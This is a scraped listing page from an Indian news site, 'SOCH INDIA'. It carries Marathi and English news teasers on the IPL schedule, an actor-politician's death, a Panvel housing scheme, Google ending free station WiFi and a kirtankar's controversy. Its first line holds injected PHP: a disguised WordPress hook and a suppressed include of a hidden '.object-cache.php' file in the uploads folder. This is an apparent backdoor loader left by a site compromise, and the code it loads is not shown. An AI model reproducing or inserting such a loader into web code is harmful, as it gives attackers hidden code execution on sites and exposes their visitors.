add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

भारतीय क्रिकेट नियामक मंडळ अर्थात बीसीसीआयने आयपीएलच्या १३व्या हंगामाचे वेळापत्रक जाहीर केले आहे. गेल्या काही दिवसांपासून आयपीएलच्या वेळापत्रकाची चाहते वाट पाहत होते. आयपीएलच्या अधिकृत वेबसाईटवर साखळी फेरीतील ५६ सामन्यांचे वेळापत्रक जाहीर करण्यात आले आहे. आयपीएलच्या १३व्या हंगामातील पहिला सामना विद्यमान विजेते मुंबई इंडियन्स विरुद्ध विद्यमान उपविजेते चेन्नई सुपर किंग्ज...

Read More

तृणमूल काँग्रेसचे माजी खासदार आणि अभिनेते तापस पॉल यांचं कार्डिअक अरेस्टमुळे निधन झाले आहे. मुंबईत त्यांनी अखेरचा श्वास घेतला. मंगळवारी सकळी वांद्रे येथील हॉली फॅमेली रुग्णालयात उपचारादरम्यान त्यांचं निधन झाले. त्यांच्या निधनामुळे कलाविश्वाला त्याचप्रमाणे राजकिय क्षेत्राला मोठा धक्का बसला आहे. तापल पॉल हे ६१ वर्षांचे होते. एएनआयच्या वृत्तानुसार त्यांचं...

Read More

पनवेल शहर पालिका क्षेत्रात लाखो झोपडपट्टीवासीयांचे लक्ष लागलेल्या झोपडपट्टी पुनर्वसन पंतप्रधान आवास योजनेची संचिका (फाइल) कृतीसमोर अंतिम मंजुरीसाठी ठेवण्यात आली आहे. पंतप्रधान आवास योजनेला राज्य सरकारची मंजुरी मिळाली आहे. सध्या पनवेल पालिकेच्या पंतप्रधान आवास योजनेची संचिका राज्याच्या प्रकल्प समितीसमोर ठेवण्यात आली आहे. इमारत बांधकाम आणि इतर परवानग्यांसाठी पुढील चार...

Read More

भाजपा २५ फेब्रुवारीला महाविकास आघाडीच्या सरकारविरोधात मोर्चा काढणार आहे. पण त्यासाठी कायकर्ते कुठून आणणार, आंदोलनासाठी भाजपा रोजंदारीवर लोकं आणणार का, असा सवाल राष्ट्रवादी काँग्रेसचे प्रवक्ते आणि राज्य सरकारमधील मंत्री नवाब मलिक यांनी विचारला आहे. सत्ता गेल्यामुळे भाजपाकडे आता कार्यकर्ते उरलेले नाहीत, कमळाबाईला शिवसेनेने सोडचिठ्ठी दिली आहे असे नवाब मलिक म्हणाले....

Read More

The Jammu and Kashmir Police on Monday registered a case under the stringent Unlawful Activities (Prevention) Act against people for defying government orders on use of social media. This came after the administration on January 14 had issued an order banning all social media sites in the Valley. “Taking serious note...

Read More

Google कडून रेल्वे स्थानकांवर मिळणारी मोफत WiFi ची सेवा आता मिळणार नाही. ‘पाच वर्षांपूर्वी ही सेवा सुरू झाल्यापासून आतापर्यंत ऑनलाईन जाणे खूप सोपे आणि स्वस्त झाले आहे’, असे म्हणत गुगलने मोफत वायफाय सेवा पुरवणारा ‘Google Station’हा प्रकल्प भारतासह अन्य देशांमध्येही बंद करत असल्याची माहिती सोमवारी दिली. ‘आता बहुतांश ठिकाणी...

Read More

‘कसे आहात सगळे? मजेत ना? आणि आपला नेहमीचा आपुलकीचा प्रश्न हसताय ना? हसलंच पाहिजे, असं म्हणत प्रेक्षकांना आपलसं करणारा निवेदक म्हणजे डॉ. निलेश साबळे. लोकप्रिय कार्यक्रम ‘चला हवा येऊ द्या’ची गेल्या तीन वर्षांपासून एकहाती सूत्रे सांभाळणारा हा कलावंत. केवळ निवेदनच नाही तर लेखन, दिग्दर्शन आणि अभिनय या सर्व जबाबदाऱ्या लिलया...

Read More

शहरातील माझगावच्या जीएसटी भवनला लागलेली आग आता आटोक्यात आली आहे. जीएसटीच्या नव्या इमारतीला ही आग लागली होती. आठव्या आणि नवव्या मजल्याला ही आग लागली होती. आगीचे कारण मात्र अद्यापही समजू शकलेलं नाही. जीएसटीचे सर्व कर्मचारी सुखरूप आहेत. काही मजूर अडकल्याची भीती व्यक्त करण्यात आली होती. मात्र सर्व मजूरही इमारतीच्या...

Read More

निवृत्ती महाराज इंदुरीकर यांचं बीड जिल्ह्यातील आष्टीतील कड्याजवळच्या कुंभारवाडीमध्ये रविवारी दुपारी किर्तन होते. या किर्तनाला येताना इंदुरीकर महाराजांचे जंगी स्वागत करण्यात आलं. विशेष म्हणजे ‘आय सपोर्ट इंदुरीकर’ अशा नावाचे फलक घेतलेले लोक या कीर्तनामध्ये सहभागी झाले होते. महाराज आम्ही तुमच्या सोबत आहोत, अशाही आशयाचे फलक लोकांच्या हातात होते.. या...

Read More

हभप किर्तनकार इंदुरीकर महाराज यांच्या एका वक्तव्यामुळे चांगलेच अडचणीत सापडले आहेत. एका किर्तनात त्यांनी समतिथीला स्त्रीयांशी संबंध ठेवल्यास मुलगा आणि विषम तिथीला संबंध ठेवल्यास मुलगी होते असे वक्तव्य केले होते. त्यामुळे ते चांगलेच अडचणीत सापडले. यादरम्यान इंदुरीकर महाराजांच्या समर्थनार्थ अनेक लोकं पुढे आले आहेत. त्यांच्यासाठी आंदोलन करण्याची चाहत्यांनी तयारी...

Read More